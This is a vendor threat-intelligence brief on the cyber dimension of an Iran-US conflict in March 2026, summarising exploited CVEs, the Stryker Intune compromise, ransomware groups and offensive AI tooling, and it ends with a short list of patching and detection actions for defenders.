CRITICAL 12 min read 17 Mar 2026

The Doctrine Is the Threat: War Week 3 Full-Day Brief

Today produced the clearest strategic picture of the Iran-US conflict's cyber dimension since it began on 28 February. Two of Iran's most senior national security officials were killed, named Iranian cyber operators were physically eliminated — and the attacks continued anyway. Decapitation is not deterrence when the infrastructure is distributed.

Key findings
01
Command Decapitation Did Not Deter — Operations Continued Without Pause
CRITICAL
Israeli strikes killed Ali Larijani (SNSC Secretary) and Gholamreza Soleimani (Basij Commander). Named Iranian cyber operators physically eliminated. Iranian operations continued without detectable pause. Distributed infrastructure and decentralised proxy layer (Handala, Void Manticore, MuddyWater) sustains operations regardless of IRGC leadership status.
Iran / IRGC / MOIS
02
CISA CVIE: 136 Iranian-Targeted CVEs Across All 16 US Critical Infrastructure Sectors
CRITICAL
Most authoritative Iranian targeting watchlist published to date. Over 3,100 US entities estimated to have exposure. Qualys operationalised as VMDR feature same day. Advisory layer for client-specific cross-referencing does not yet exist as a packaged service.
Iran
03
Stryker Forensic Correction: Existing Intune Admin Account — Not New Global Admin
HIGH
TechCrunch and WSJ correction: attacker used compromised existing Intune admin account. Most detection rules updated after early reporting (targeting new account creation) have a gap. NHS UK procurement formally affected — Day 11 is the longest documented sustained US medtech disruption.
Handala
04
Wing FTP Exploit Chain Active: CVE-2025-47813 + CVE-2025-47812 Chained in Production
HIGH
Info disclosure leaks installation path, enabling targeted RCE. Huntress confirmed attackers executing malicious Lua files, running recon, and installing RMM tools. Both patched in Wing FTP 7.4.4+. Federal deadline March 30.
CVE-2025-47813 Unknown
05
World Leaks Encryption Capability Confirmed — Exfil-Only Characterisation Superseded
HIGH
Darktrace second case study confirms World Leaks (formerly Hunters International) deploys full ransomware encryption in addition to exfil-only. Prior detection models keying on encryption events will miss exfil-only attacks. Behavioural baseline models will miss neither.
World Leaks / Hunters International
06
LeakNet: Deno Fileless Loader — Near-Zero EDR Visibility in Production Ransomware
HIGH
ClickFix fake CAPTCHA deploys legitimate Deno JavaScript runtime as in-memory loader. Deno is code-signed, trusted by default in most EDR rulesets. Three independent sources confirmed same day.
LeakNet
07
Agentic Offensive Tools Now Startup-Accessible — Tenzai Top 1% of 125K Competitors
HIGH
Israeli startup using OpenAI and Anthropic tooling places in top 1% across six elite cybersecurity competitions. Third independent offensive AI signal in one week alongside PROMPTFLUX and Slopoly/Hive0163.
Tenzai (research context)

Today produced the clearest strategic picture of the Iran-US conflict's cyber dimension since it began on 28 February.

The defining finding: two of Iran's most senior national security officials were killed, named Iranian cyber operators were physically eliminated — and the attacks continued anyway. Decapitation is not deterrence when the infrastructure is distributed.

ISraeli strikes killed Ali Larijani, Secretary of Iran's Supreme National Security Council, and Gholamreza Soleimani, Commander of the Basij. Forbes confirmed US and Israeli strikes also killed at least two named Iranian cyber operators, including Mohammad Mehdi Farhadi Ramin, DOJ-charged in 2020 for aerospace and defence hacking. Iranian operations continued without detectable pause. Iran's hacktivist proxy layer — Handala, Void Manticore, MuddyWater — is sufficiently decentralised to sustain operations regardless of who in the IRGC is still alive.

CISA published a Cyber Vulnerability Insights Estimate cataloguing 136 CVEs that Iranian government-sponsored actors have targeted or exploited — the most authoritative Iranian targeting watchlist published to date, covering all 16 US critical infrastructure sectors.

The Stryker forensic picture was corrected: the attacker used a compromised existing Intune administrator account, not a newly created Global Admin. Detection rules updated after early Stryker reporting that target new account creation have a gap. NHS UK procurement is now formally affected — Day 11 is the longest documented sustained US medtech disruption from a destructive cyberattack.

Six defensive actions with the highest signal-to-noise ratio: (1) Update Intune detection rules to alert on bulk Wipe commands from existing privileged accounts. (2) Patch Hikvision CVE-2017-7921 and Rockwell CVE-2021-22681 — CISA KEV, March 26 deadline, nine days. (3) Signal Registration Lock for senior leaders. (4) Chrome 146.0.7680.75+ — March 27 federal deadline. (5) Patch any pac4j-jwt Java services — CVE-2026-29000, CVSS 10.0, public PoC live. (6) Wing FTP Server 7.4.4+ — March 30 deadline, confirmed RCE chain active.

irandecapitationcisa-cviestrykerworld-leaksleaknetagentic-aiics-ot

Act on this brief

Map detection coverage gaps for the techniques above, or generate Sigma rules from the named CVEs.

Try DCV Try CloudSigma ← Back to feed